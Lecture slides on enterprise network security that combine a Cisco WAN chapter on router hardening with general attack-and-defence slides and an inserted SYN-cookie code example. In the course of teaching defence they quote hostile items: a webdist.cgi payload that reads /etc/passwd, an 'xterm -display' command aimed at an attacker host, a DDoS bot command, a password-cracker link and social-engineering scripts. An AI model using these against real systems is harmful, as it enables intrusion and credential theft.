Enterprise Network Security

Accessing the WAN – Chapter 4

Version 4.0

© 2006 Cisco Systems, Inc. All rights reserved.

Cisco Public

1

Objectives
– Describe the general methods used to mitigate security threats to Enterprise networks
– Configure Basic Router Security
– Explain how to disable unused Cisco router network services and interfaces
– Explain how to use Cisco SDM
– Manage Cisco IOS devices


A Brief History of the World


What is "Security"?
Dictionary.com says:
1. Freedom from risk or danger; safety.
2. Freedom from doubt, anxiety, or fear; confidence.
3. Something that gives or assures safety, as:
   1. A group or department of private guards: Call building security if a visitor acts suspicious.
   2. Measures adopted by a government to prevent espionage, sabotage, or attack.
   3. Measures adopted, as by a business or homeowner, to prevent a crime such as burglary or assault: Security was lax at the firm's smaller plant.
   4. …etc.

Why do we need security?
– Protect vital information while still allowing access to those who need it
  – Trade secrets, medical records, etc.
– Provide authentication and access control for resources
  – Ex: AFS
– Guarantee availability of resources
  – Ex: 5 9's (99.999% reliability)


Who is vulnerable?
– Financial institutions and banks
– Internet service providers
– Pharmaceutical companies
– Government and defense agencies
– Contractors to various government agencies
– Multinational corporations
– ANYONE ON THE NETWORK

Common security attacks and their countermeasures
– Finding a way into the network: Firewalls
– Exploiting software bugs, buffer overflows: Intrusion Detection Systems
– Denial of Service: Ingress filtering, IDS
– TCP hijacking: IPSec
– Packet sniffing: Encryption (SSH, SSL, HTTPS)
– Social problems: Education

Firewalls
– Basic problem: many network applications and protocols have security problems that are fixed over time
  – Difficult for users to keep up with changes and keep hosts secure
  – Solution: administrators limit access to end hosts by using a firewall
  – The firewall is kept up to date by administrators

Firewalls
– A firewall is like a castle with a drawbridge
  – Only one point of access into the network
  – This can be good or bad
– Can be hardware or software
  – Ex. Some routers come with firewall functionality
  – ipfw, ipchains, pf on Unix systems
  – Windows XP and Mac OS X have built-in firewalls

Firewalls
[Figure: Internet – Firewall – DMZ (web server, email server, web proxy, etc.) – Firewall – Intranet]

Firewalls
– Used to filter packets based on a combination of features
  – These are called packet filtering firewalls
  – There are other types too, but they will not be discussed
  – Ex. Drop packets with destination port of 23 (Telnet)
  – Can use any combination of IP/UDP/TCP header information
  – man ipfw on unix47 for much more detail
– But why don't we just turn Telnet off?

Firewalls
– Here is what a computer with a default Windows XP install looks like:
  135/tcp   open  loc-srv
  139/tcp   open  netbios-ssn
  445/tcp   open  microsoft-ds
  1025/tcp  open  NFS-or-IIS
  3389/tcp  open  ms-term-serv
  5000/tcp  open  UPnP
– Might need some of these services, or might not be able to control all the machines on the network

Intrusion Detection
– Uses "intrusion signatures"
  – Well known patterns of behavior: ping sweeps, port scanning, web server indexing, OS fingerprinting, DoS attempts, etc.
– Example: IRIX vulnerability in webdist.cgi
  – Can make a rule to drop packets containing the line "/cgi-bin/webdist.cgi?distloc=?.cat%20/etc/passwd"
– However, IDS is only useful if contingency plans are in place to curb attacks as they are occurring

Minor Detour…
– Say we got the /etc/passwd file from the IRIX server
– What can we do with it?

Dictionary Attack
– We can run a dictionary attack on the passwords
  – The passwords in /etc/passwd are encrypted with the crypt(3) function (one-way hash)
  – Can take a dictionary of words, crypt() them all, and compare with the hashed passwords
– This is why your passwords should be meaningless random junk!
  – For example, "sdfo839f" is a good password
  – That is not my andrew password
  – Please don't try it either

Denial of Service
– Purpose: Make a network service unusable, usually by overloading the server or network
– Many different kinds of DoS attacks
  – SYN flooding
  – SMURF
  – Distributed attacks
  – Mini Case Study: Code-Red

Denial of Service
– SYN flooding attack
– Send SYN packets with bogus source address
  – Why?
– Server responds with SYN ACK and keeps state about the TCP half-open connection
  – Eventually, server memory is exhausted with this state
– Solution: use "SYN cookies"
  – In response to a SYN, create a special "cookie" for the connection, and forget everything else
  – Then, can recreate the forgotten information when the ACK comes in from a legitimate connection
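The SYN-cookie mechanism described above, as an added example that is not part of the original slides: the server encodes a time counter, an MSS table index and a keyed hash of the connection 4-tuple into its initial sequence number, stores nothing, and recovers everything from the final ACK. The secret key, MSS table and the 64-second counter are assumptions made for the demo.

```python
"""SYN cookies: a stateless SYN/ACK whose sequence number can be validated later.
Layout (Bernstein's scheme): bits 31-27 = time counter mod 32, bits 26-24 =
index into an MSS table, bits 23-0 = keyed hash of (addresses, ports, t)
plus the client's ISN, truncated to 24 bits."""
import hashlib
import hmac
import struct
import time

SECRET = b"constructed-demo-secret"     # constructed; a real stack uses a random per-boot key
MSS_TABLE = [536, 1220, 1440, 1460]      # assumed table; the index must fit in 3 bits
MAX_AGE = 4                              # accept cookies up to 4 counter ticks old


def counter(now=None):
    """Coarse time counter that advances every 64 seconds."""
    return int(time.time() if now is None else now) // 64


def _keyed_hash(saddr, daddr, sport, dport, t):
    msg = struct.pack("!4s4sHHI", saddr, daddr, sport, dport, t & 0xFFFFFFFF)
    return int.from_bytes(hmac.new(SECRET, msg, hashlib.sha256).digest()[:4], "big")


def make_cookie(saddr, daddr, sport, dport, client_isn, mss, t):
    """Server ISN to put in the SYN/ACK; no half-open state is kept."""
    idx = 0
    for i, m in enumerate(MSS_TABLE):      # largest table entry <= client's MSS
        if m <= mss:
            idx = i
    low = (_keyed_hash(saddr, daddr, sport, dport, t) + client_isn) & 0xFFFFFF
    return ((t & 31) << 27) | (idx << 24) | low


def check_cookie(saddr, daddr, sport, dport, client_seq, ack, t_now):
    """Validate the handshake's final ACK. client_seq is that packet's sequence
    number (client ISN + 1) and ack its acknowledgement number (cookie + 1).
    Returns the recovered MSS, or None if the cookie is forged or too old."""
    cookie = (ack - 1) & 0xFFFFFFFF
    client_isn = (client_seq - 1) & 0xFFFFFFFF
    age = (t_now - (cookie >> 27)) & 31    # how many ticks ago t was, mod 32
    if age > MAX_AGE:
        return None
    t = t_now - age                        # reconstruct the full counter value
    expected = (_keyed_hash(saddr, daddr, sport, dport, t) + client_isn) & 0xFFFFFF
    if expected != (cookie & 0xFFFFFF):
        return None
    return MSS_TABLE[(cookie >> 24) & 7]
```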

Denial of Service
[Figure]

Denial of Service
– SMURF
  – Source IP address of a broadcast ping is forged
  – Large number of machines respond back to the victim, overloading it

Denial of Service
[Figure]

Denial of Service
– Distributed Denial of Service
  – Same techniques as regular DoS, but on a much larger scale
  – Example: Sub7Server Trojan and IRC bots
    – Infect a large number of machines with a "zombie" program
    – Zombie program logs into an IRC channel and awaits commands
  – Example:
    – Bot command: !p4 207.71.92.193
    – Result: runs ping.exe 207.71.92.193 -l 65500 -n 10000
    – Sends 10,000 64k packets to the host (655MB!)
  – Read more at: http://grc.com/dos/grcdos.htm

Denial of Service
– Mini Case Study: CodeRed
  – July 19, 2001: over 359,000 computers infected with Code-Red in less than 14 hours
  – Used a recently known buffer exploit in Microsoft IIS
  – Damages estimated in excess of $2.6 billion


Denial of Service
– Why is this under the Denial of Service category?
  – CodeRed launched a DDoS attack against www1.whitehouse.gov from the 20th to the 28th of every month!
  – Spent the rest of its time infecting other hosts


Denial of Service
– How can we protect ourselves?
  – Ingress filtering
    – If the source IP of a packet comes in on an interface which does not have a route to that packet, then drop it
    – RFC 2267 has more information about this
  – Stay on top of CERT advisories and the latest security patches
    – A fix for the IIS buffer overflow was released sixteen days before CodeRed had been deployed!


TCP Attacks
– Recall how IP works…
  – End hosts create IP packets and routers process them purely based on the destination address alone
– Problem: End hosts may lie about other fields which do not affect delivery
  – Source address: a host may trick the destination into believing that the packet is from a trusted source
  – Especially applications which use IP addresses as a simple authentication method
  – Solution: use better authentication methods

TCP Attacks
– TCP connections have associated state
  – Starting sequence numbers, port numbers
– Problem: what if an attacker learns these values?
  – Port numbers are sometimes well known to begin with (ex. HTTP uses port 80)
  – Sequence numbers are sometimes chosen in very predictable ways

TCP Attacks
– If an attacker learns the associated TCP state for the connection, then the connection can be hijacked!
– Attacker can insert malicious data into the TCP stream, and the recipient will believe it came from the original source
  – Ex. Instead of downloading and running a new program, you download a virus and execute it

TCP Attacks
– Say hello to Alice, Bob and Mr. Big Ears

TCP Attacks
– Alice and Bob have an established TCP connection

TCP Attacks
– Mr. Big Ears lies on the path between Alice and Bob on the network
  – He can intercept all of their packets

TCP Attacks
– First, Mr. Big Ears must drop all of Alice's packets since they must not be delivered to Bob (why?)
[Figure: Packets → The Void]

TCP Attacks
– Then, Mr. Big Ears sends his malicious packet with the next ISN (sniffed from the network)
[Figure: ISN, SRC=Alice]

TCP Attacks
– What if Mr. Big Ears is unable to sniff the packets between Alice and Bob?
  – Can just DoS Alice instead of dropping her packets
  – Can just send guesses of what the ISN is until it is accepted
– How do you know when the ISN is accepted?
  – Mitnick: payload is "add self to .rhosts"
  – Or, "xterm -display MrBigEars:0"

TCP Attacks
– Why are these types of TCP attacks so dangerous?
[Figure: Web server, Trusting web client, Malicious user]

TCP Attacks
– How do we prevent this?
– IPSec
  – Provides source authentication, so Mr. Big Ears cannot pretend to be Alice
  – Encrypts data before transport, so Mr. Big Ears cannot talk to Bob without knowing what the session key is

Five Minute Break
– For your enjoyment, here is something completely unrelated to this lecture:

Packet Sniffing
– Recall how Ethernet works…
– When someone wants to send a packet to someone else…
– They put the bits on the wire with the destination MAC address…
– And remember that other hosts are listening on the wire to detect collisions…
– It couldn't get any easier to figure out what data is being transmitted over the network!

Packet Sniffing
– This works for wireless too!
– In fact, it works for any broadcast-based medium

Packet Sniffing
– What kinds of data can we get?
– Asked another way, what kind of information would be most useful to a malicious user?
– Answer: Anything in plain text
  – Passwords are the most popular

Packet Sniffing
– How can we protect ourselves?
– SSH, not Telnet
  – Many people at CMU still use Telnet and send their password in the clear (use PuTTY instead!)
  – Now that I have told you this, please do not exploit this information
  – Packet sniffing is, by the way, prohibited by Computing Services
– HTTP over SSL
  – Especially when making purchases with credit cards!
– SFTP, not FTP
  – Unless you really don't care about the password or data
  – Can also use KerbFTP (download from MyAndrew)
– IPSec
  – Provides network-layer confidentiality

Social Problems
– People can be just as dangerous as unprotected computer systems
  – People can be lied to, manipulated, bribed, threatened, harmed, tortured, etc. to give up valuable information
  – Most humans will break down once they are at the "harmed" stage, unless they have been specially trained
    – Think government here…

Social Problems
– Fun Example 1:
  – "Hi, I'm your AT&T rep, I'm stuck on a pole. I need you to punch a bunch of buttons for me"

Social Problems
– Fun Example 2:
  – Someone calls you in the middle of the night
    – "Have you been calling Egypt for the last six hours?"
    – "No"
    – "Well, we have a call that's actually active right now, it's on your calling card and it's to Egypt and as a matter of fact, you've got about $2000 worth of charges on your card and … read off your AT&T card number and PIN and then I'll get rid of the charge for you"

Social Problems
– Fun Example 3:
  – Who saw Office Space?
  – In the movie, the three disgruntled employees installed a money-stealing worm onto the company's systems
  – They did this from inside the company, where they had full access to the company's systems
  – What security techniques can we use to prevent this type of access?

Social Problems
– There aren't always solutions to all of these problems
  – Humans will continue to be tricked into giving out information they shouldn't
  – Educating them may help a little here, but, depending on how badly you want the information, there are a lot of bad things you can do to get it
– So, the best that can be done is to implement a wide variety of solutions and more closely monitor who has access to what network resources and information
  – But, this solution is still not perfect

Configure Basic Router Security
– Explain why the security of routers and their configuration settings is vital to network operation

Securing Your Network
Think about router security in terms of these categories:
1. Physical security
2. Update the router IOS whenever advisable
3. Back up the router configuration and IOS
4. Harden the router to eliminate the potential abuse of unused ports and services

Configure Basic Router Security
– Applying Cisco IOS Security Features To Routers

Configure Basic Router Security
– By default, Cisco IOS software leaves passwords in plain text when they are entered on a router. This is not secure since anyone walking behind you when you are looking at a router configuration could snoop over your shoulder and see the password.


Manage Router Security
– Using the enable password command or the username username password password command would result in these passwords being displayed when looking at the running configuration.

Manage Router Security
– Encrypting Passwords with Type 7 encryption

Cracking Type 7 Encryption
– To crack a type 7 Cisco router password go to http://www.ifm.net.nz/cookbooks/passwordcracker.html

Using MD5 Encryption
– MD5 (Message-Digest algorithm 5) is a widely used cryptographic hash function with a 128-bit hash value.

Setting Password Length
– Cisco IOS Software Release 12.3(1) and later allow administrators to set the minimum character length for all router passwords using the security passwords min-length global configuration command.

Securing Remote Administrative Access To Routers
– Controlling VTY Line 0 4 – Telnet/SSH
1. Set router parameters
2. Set the domain name
3. Generate asymmetric keys
4. Configure local authentication and vty
5. Configure SSH timeouts
6. Test SSH on PC

Explain How to Disable Unused Cisco Router Network Services and Interfaces
– Describe the router services and interfaces that are vulnerable to network attack

Explain How to Disable Unused Cisco Router Network Services and Interfaces
– Explain the vulnerabilities posed by commonly configured management services

Securing Vulnerable Router Services and Interfaces
– There are a variety of commands that are required to disable services. The show running-config output in the figure provides a sample configuration of various services which have been disabled. Services which should typically be disabled are listed below. These include:

Securing Vulnerable Router Services and Interfaces
– Disable services that allow certain packets to pass through the router, send special packets, or are used for remote router configuration. The corresponding commands to disable these services are:

Securing Vulnerable Router Services and Interfaces
– The interfaces on the router can be made more secure by using certain commands in interface configuration mode:

Explain How to Disable Unused Cisco Router Network Services and Interfaces
– Explain how to secure a router with the command-line interface (CLI) auto secure command

Locking Down A Router Using Cisco AutoSecure
– Cisco AutoSecure uses a single command to disable non-essential system processes and services, eliminating potential security threats. You can configure AutoSecure in privileged EXEC mode using the auto secure command.

Manage Cisco IOS Devices
– Describe how to back up and upgrade a Cisco IOS image

Commands for Managing Configuration Files
– Good practice for maintaining system availability is to ensure you always have backup copies of the startup configuration files and IOS image files. The Cisco IOS software copy command is used to move configuration files from one component or device to another, such as RAM, NVRAM, or a TFTP server.

Commands for Managing Configuration Files

Manage Cisco IOS Devices
– Explain how to back up and upgrade Cisco IOS software images using a network server

Manage Cisco IOS Devices
– Explain how to recover a Cisco IOS software image

Manage Cisco IOS Devices
– Compare the use of the show and debug commands when troubleshooting Cisco router configurations

Manage Cisco IOS Devices
– Explain how to recover the enable password and the enable secret passwords

Summary
– Security threats to an Enterprise network include:
  – Unstructured threats
  – Structured threats
  – External threats
  – Internal threats
– Methods to lessen security threats consist of:
  – Device hardening
  – Use of antivirus software
  – Firewalls
  – Download security updates

Summary
– Basic router security involves the following:
  – Physical security
  – Update and back up IOS
  – Back up configuration files
  – Password configuration
  – Logging router activity
– Disable unused router interfaces & services to minimize their exploitation by intruders
– Cisco SDM
  – A web-based management tool for configuring security measures on Cisco routers

Summary
– Cisco IOS Integrated File System (IFS)
  – Allows for the creation, navigation & manipulation of directories on a Cisco device
